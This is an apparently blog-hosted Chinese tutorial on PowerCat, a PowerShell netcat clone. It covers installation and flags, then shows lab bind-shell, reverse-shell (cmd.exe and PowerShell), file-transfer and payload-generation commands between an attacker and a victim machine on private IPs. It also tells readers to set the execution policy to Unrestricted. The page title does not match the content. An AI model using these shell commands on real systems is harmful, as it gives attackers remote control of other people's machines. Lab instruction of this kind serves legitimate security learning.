0
点赞
收藏
分享

微信扫一扫

02多线程基础知识

耳一文 2024-11-08 阅读 19
网络

PowerCat介绍

PowerCat是一个powershell写的tcp/ip瑞士军刀,可以看成ncat的powershell的实现,然后里面也 加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。

PowerCat安装

1、下载地址

https://github.com/besimorhino/powercat

2、下载下来导入

Import-Module .\powercat.ps1

3、如果提示未能加载指定模块,或运行不了则可能是权限问题,通过管理员权限打开powershell,输入如下代码

Set-ExecutionPolicy Unrestricted

4、输入如下命令可以查看帮助信息 powercat -h

5、如下就是安装成功

PowerCat命令

-l监听连接

-c连接到侦听器

-p要连接或监听的端口

-e执行 -ep执行Powershell

-r中继。格式:“-r tcp:10.1.1.1:443”

-u通过UDP传输数据

-dns通过dns传输数据

-dnsft DNS故障阈值

-t超时选项。默认值:60

-I输入:文件路径(字符串),字节数组或字符串

-o控制台输出类型:“主机”,“字节”或“字符串”

-of输出文件路径

-d连接后断开连接

-rep中继器。断开连接后重新启动

-g生成有效载荷

-ge生成编码的有效载荷

-h打印帮助消息

PowerCat实验环境简介

机器名称机器IP
攻击机192.168.14.137
靶机192.168.14.131

PowerCat和nc正向连接

1、靶机使用powercat执行以下命令

powercat -l -p 8080 -e cmd.exe -v

2、攻击机使用nc执行以下命令po

nc 192.168.14.131 8080 -vv

3、查看返回结果

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令

powercat -c 192.168.14.137 -p 8888 -v -e cmd.exe

2、攻击机使用nc执行以下命令

nc -l -p 8888 -vv

3、查看返回结果

PowerCat和PowerCat反向连接

1、靶机使用powercat执行以下命令

powercat -c 192.168.14.137 -p 9999 -v -ep

2、攻击机使用powercat执行以下命令

powercat -l -p 9999 -v

3、查看返回结果

PowerCat文件传输

1、靶机使用powercat执行以下命令

powercat -l -p 9999 -of test.txt -v

2、攻击机使用powercat执行以下命令

powercat -c 192.168.3.10 -p 9999 -i D:test.txt -v

3、查看返回结果

用powercat生成payload

1、攻击机使用powercat执行以下命令生成payload

2、攻击机使用powercat执行以下命令连接

powercat -c 192.168.3.10 -p 8000 -v

3、在靶机上运行脚本

.\shell.ps1

4、查看运行结果

举报

相关推荐

0 条评论